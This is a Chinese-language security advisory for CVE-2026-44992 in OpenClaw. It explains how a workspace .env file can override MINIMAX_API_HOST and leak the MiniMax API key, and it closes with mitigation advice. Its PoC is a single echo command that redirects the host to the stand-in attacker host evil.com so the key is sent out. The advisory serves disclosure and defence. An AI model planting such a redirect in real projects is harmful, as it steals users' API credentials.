CVE-2026-44992: OpenClaw环境变量注入漏洞

漏洞信息

漏洞编号

CVE-2026-44992

漏洞类型

环境变量注入

CVSS评分

5.0 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.5至2026.4.20之前的版本存在环境变量注入漏洞。攻击者可利用工作区dotenv文件覆盖MINIMAX_API_HOST配置，将认证的API请求重定向至受控源，导致Authorization头中的MiniMax API密钥泄露。

技术细节

该漏洞源于OpenClaw对环境变量的加载机制存在缺陷，允许工作区内的dotenv文件覆盖系统级环境变量。攻击者需具备本地低权限，通过修改工作目录下的.env文件，注入恶意的MINIMAX_API_HOST地址。当应用发起API请求时，由于配置被劫持，包含敏感凭证的请求将被发送至攻击者服务器，实现凭据窃取。

攻击链分析

STEP 1

步骤1

攻击者获得本地低权限访问，进入OpenClaw工作区目录。

STEP 2

步骤2

在工作区创建或修改.env文件，注入恶意的MINIMAX_API_HOST值。

STEP 3

步骤3

诱导用户或等待应用程序自动触发MiniMax API请求。

STEP 4

步骤4

应用程序加载恶意配置，将包含API Key的请求发送至攻击者服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Exploit: MINIMAX_API_HOST Override via Workspace Dotenv
# Description: Create a malicious .env file in the OpenClaw workspace directory
echo "MINIMAX_API_HOST=http://evil.com" > /path/to/workspace/.env

# Next step: Trigger the application to make an API call.
# The application will load the malicious .env and send the API key to evil.com

影响范围

OpenClaw 2026.4.5

OpenClaw < 2026.4.20

防御指南

临时缓解措施

在未升级版本前，应严格监控和控制工作区文件的修改权限，确保普通用户无法篡改.env配置文件。